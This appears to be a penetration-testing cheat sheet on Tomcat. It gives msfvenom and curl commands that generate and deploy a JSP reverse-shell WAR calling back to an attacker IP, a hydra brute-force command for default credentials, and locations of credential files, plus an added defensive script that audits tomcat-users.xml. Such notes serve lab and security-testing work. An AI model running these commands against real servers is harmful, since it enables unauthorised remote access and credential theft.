Tomcat
- AJP / port 8009
  - Tomcat proxy that gives localhost access to the machine
Reverse shell
Deploy .war reverse shell
```title="Generate payload"
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.83 LPORT=4444 -f war > shell.war
```
```title="Upload the shell"
curl -u '<username>:<password>' 'http://10.129.241.149:8080/manager/text/deploy?path=/shell' --upload-file shell.war
```
- Upload locations
  - manager-gui - /manager/html/
  - manager-script - /manager/text/
Brute force credentials
```
hydra -C /seclists/passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://10.0.0.25:8080/host-manager/html
```
Interesting Files
List of user credentials and permissions.
This file can be in multiple locations. `$CATALINA_BASE/conf/tomcat-users.xml` is the configuration file, but any of the locations below could be linked to `conf/tomcat-users.xml`:
- tomcat-users.xml
  - /etc/tomcat9/tomcat-users.xml
  - /opt/tomcat/apache-tomcat-9.0.54/conf/tomcat-users.xml
  - /usr/share/tomcat9/etc/tomcat-users.xml
  - /var/lib/ucf/cache/:etc:tomcat9:tomcat-users.xml
- /usr/lib/systemd/system/tomcat9.service
  - Will show CATALINA_HOME and CATALINA_BASE variables
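
A defensive check over the file described above, as an added example that is not part of the original page: it parses a tomcat-users.xml and reports accounts holding manager-gui or manager-script (the roles behind the two upload locations listed earlier) and whether their password is trivially guessable. The sample XML, the small weak-password set and the function names are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Roles named on this page and the deployment endpoint each one unlocks.
DEPLOY_ROLES = {"manager-gui": "/manager/html/", "manager-script": "/manager/text/"}
# Constructed sample of guessable passwords (assumption; not a real wordlist).
WEAK_PASSWORDS = {"", "tomcat", "admin", "password", "s3cret", "changeme"}

# Constructed sample file for the demonstration.
SAMPLE = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="tomcat" roles="manager-gui"/>
  <user username="deploy" password="Xk9#vQ2!pLm7wZ" roles="manager-script, manager-jmx"/>
  <user username="monitor" password="Rt5$hN8@cYb3" roles="manager-status"/>
</tomcat-users>
"""


def local(tag):
    """Strip the XML namespace so the check works with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return one finding per account that is allowed to deploy applications."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if local(el.tag) != "user":
            continue
        # Older files may use 'name' instead of 'username'.
        name = el.get("username") or el.get("name") or ""
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        endpoints = sorted(DEPLOY_ROLES[r] for r in roles & DEPLOY_ROLES.keys())
        if not endpoints:
            continue  # e.g. manager-status only: cannot upload a WAR
        password = el.get("password", "").lower()
        # Weak if it is in the sample set or simply repeats the username.
        weak = password in WEAK_PASSWORDS or password == name.lower()
        findings.append({"user": name, "endpoints": endpoints, "weak_password": weak})
    return findings


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE):
        print(finding)
```

Any account it reports with `weak_password` set should have its password rotated, and deployment roles should be removed from accounts that do not need them.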
Find other files
Search for the Apache version + Ubuntu to find the Ubuntu distribution that is most likely running on the box. Then Google the distribution name + tomcat to find the Tomcat file directories installed on the box.
Install Tomcat and search for the location on your own box. Example: `sudo apt install tomcat9`